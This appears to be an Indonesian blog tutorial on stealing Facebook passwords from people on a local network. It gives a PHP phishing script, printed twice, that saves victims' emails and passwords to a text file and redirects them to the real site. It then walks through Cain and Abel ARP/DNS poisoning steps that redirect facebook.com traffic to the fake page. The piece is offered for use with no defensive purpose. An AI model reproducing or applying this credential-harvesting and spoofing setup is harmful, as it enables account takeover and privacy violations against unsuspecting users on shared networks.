Sniffing adalah sebuah aktivitas untuk melakukan penyadapan, sehingga jika dihubungkan dengan Judul diatas maka tutorial kali ini saya akan membagi pengalaman untuk menyadap Password Facebook menggunakan Metode Man In The Middle dan Phising. Man In The Middle atau biasa disingkat dengan MITM sendiri adalah sebuah Tekhnik yang digunakan yang kira-kira maksudnya adalah sebuah metode dimana seorang hacker akan berada di jalur antara User dan Host. selanjutnya Phising bermakna sebuah metode untuk medapatkan User Credential menggunakan akun/halaman palsu sehingga User terkecoh dengan informasi palsu yang kita gunakan.
Jika merujuk pada judul postingan ini, maka tutorial ini mengajarkan bagaimana anda bisa mendapatkan User Credential (Username & Password) dengan cara menipu User untuk masuk ke sebuah situs yang mirip dengan Facebook sehingga user tersebut memasukan User Credential nya ke situs palsu yang telah kita buat dan otomatis User Credential tadi tersimpan di dalam sebuah file yang telah kita siapkan sebelumnya.
Semoga bermanfaat bagi anda : Cukup beberapa langkah saja, anda sudah bisa Mengkonfigurasi Mikrotik
Alur kerja dari Tekhnik/Metode ini kira-kira seperti ini, Saat user mengakses sebuah Website kita ambil contoh facebook, maka seorang Hacker/Attacker akan melakukan Poison (Meracuni) di sebuah jaringan yang berakibat jika ada user yang mengakses situ www.facebook.com maka akan di arahkan Ke Komputer Host lain yang di dalamnya sudah tersimpan halaman Fake Login yang tampilanya mirip dengan tampilan Facebook asli. Selanjutnya jika user tersebut melakukan proses login di halaman Fake Login tersebut maka data User Credentialnya akan tersimpan otomatis.
Yang Dibutuhkan :
- Cain And Able
- Web Server Seperti XAMPP,WAMPP,AppServ atau yang lainya
- Script Fake Login
Penggunaan Web Server sebenarnya Optional alias tidak harus, Karena bisa saja anda menggunakan Hostingan Sebagai tempat menyimpan File Fake login anda, namun karena alasan Efisiensi makanya saya menyarankan anda untuk membuat web server Local sendiri menggunakan Aplikasi tersebut diatas dengan tujuan untuk mempercepat tampilnya halaman Fake Login tanpa harus mengarah ke IP/Komputer Host Online.
Untuk Fake Login Sendiri cara mendapatkanya sebenarnya cukup simpel yaitu cukup dengan menyimpan halaman Login asli dan memodifikasi sedikit perintah PHP nya.
Proses Pembuatan Halaman Fake Login Facebook
$email = $_POST['email'];
$pass = $_POST['pass'];
$text=$_POST["text"];
$file = fopen("hasil.txt","a");
if($file)
{
fputs($file,"\n Email: ".$email);
fputs($file,"\n Password :".$pass);
fputs($file,"\n");
}
fclose($file);
?>
<script language="javascript">document.location.href='http://www.facebook.com';</script>
Proses Poisoning
Proses Pembuatan Halaman Fake Login Facebook
- Buka Situs Facebook
- Save halaman tersebut dengan menekan tombol CTRL + S Dikeyboard anda lalu beri nama index.html
- Simpan Halaman & Folder yang anda telah download tadi ke directory Webserver anda
- Buat 2 buah file dengan nama tangkap.php dan hasil.txt
- tempatkan 2 file tersebut bersama dengan halaman Facebook yang sudah anda download sebelumnya
- Buka halaman Facebook yang sudah didownload sebelumnya menggunakan Notepad atau Notepad++
- Edit Action Form login
- Menjadi seperti dibawah ini
- Isi kode di bawah ini ke dalam file tangkap.php
$email = $_POST['email'];
$pass = $_POST['pass'];
$text=$_POST["text"];
$file = fopen("hasil.txt","a");
if($file)
{
fputs($file,"\n Email: ".$email);
fputs($file,"\n Password :".$pass);
fputs($file,"\n");
}
fclose($file);
?>
<script language="javascript">document.location.href='http://www.facebook.com';</script>
- Silahkan dicoba dahulu dengan mengakses halaman fake login anda dari browser
- Setelah didownload dan diinstall, Buka Cain And Abel
- Klik Start Sniffer (Lingkar Merah)
- Cek IP Komputer Anda
- Pindah Ke Tab Sniffer (Yang saya Blok Berwarna Kuning)
- Klik APR (Lingkar Biru)
- Lalu Klik APR-DNS (Lingkar Merah)
- Klik Tambah (Tombol Plus Lingkar Kuning)
- DNS Name Requested di isi www.facebook.com
- IP Address To Rewrite di isi IP Komputer kita (192.168.0.101)
- Klik OK
- Klik Hosts (Ujung Kiri Bawah, Sebelah APR)
- Klik Kanan dan Pilih Scan MAC Address
- Kembali Ke TAB APR lalu klik menu APR
- Klik Tambah (Tombol Plus)
- Lalu Klik OK
- Klik Start/Stop APR (Lingkar Biru)
Selesai. Hasilnya, Jika ada komputer/Laptop/HP di dalam jaringan anda yang ingin mengakses www.facebook.com maka akan di belok kan ke Halaman FaKe Login yang anda simpan di direktori webserver anda, dan otomatis username/email dan password yang di input orang tersebut akan disimpan di dalam File hasil.txt
Just Info : Seperti ini cara konfigurasi agar Hotspot Mikrotik jalan Bersamaan dengan UseeTv Indihome dalam satu Jaringan Wireless
Sekian Dan terima Kasih :D
EmoticonEmoticon